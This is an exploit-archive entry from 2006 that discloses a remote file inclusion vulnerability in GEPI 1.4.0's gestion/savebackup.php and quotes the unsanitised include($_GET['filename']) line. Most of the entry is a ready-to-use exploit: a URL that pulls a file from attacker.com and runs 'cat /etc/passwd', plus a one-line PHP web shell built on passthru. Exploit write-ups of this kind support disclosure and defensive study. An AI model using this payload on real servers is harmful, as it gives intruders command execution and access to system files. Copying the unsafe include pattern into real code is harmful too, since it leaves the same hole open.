[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : GEPI <= 1.4.0 gestion/savebackup.php Remote File Include Vulnerability
# Published : 2006-10-31
# Author : Sumit Siddharth
# Previous Title : TikiWiki 1.9.5 Sirius (sort_mode) Information Disclosure Vulnerability
# Next Title : P-Book <= 1.17 (pb_lang) Remote File Inclusion Vulnerabilities


Package:- gepi 1.4.0
http://adullact.net/frs/download.php/992/gepi-1.4.0.tar.gz

impact:- highly critical ..System Access..
vulnerable code:-
      include($_GET['filename']);
in gepi/gestion/savebackup.php

Exploit:-
http://localhost/gepi/gestion/savebackup.php?filename=http://attacker.com/test.txt&cmd=cat
/etc/passwd

in test.txt
<? passthru("$_GET[cmd]");?>

Credits:-
$um$id

# www.Syue.com [2006-10-31]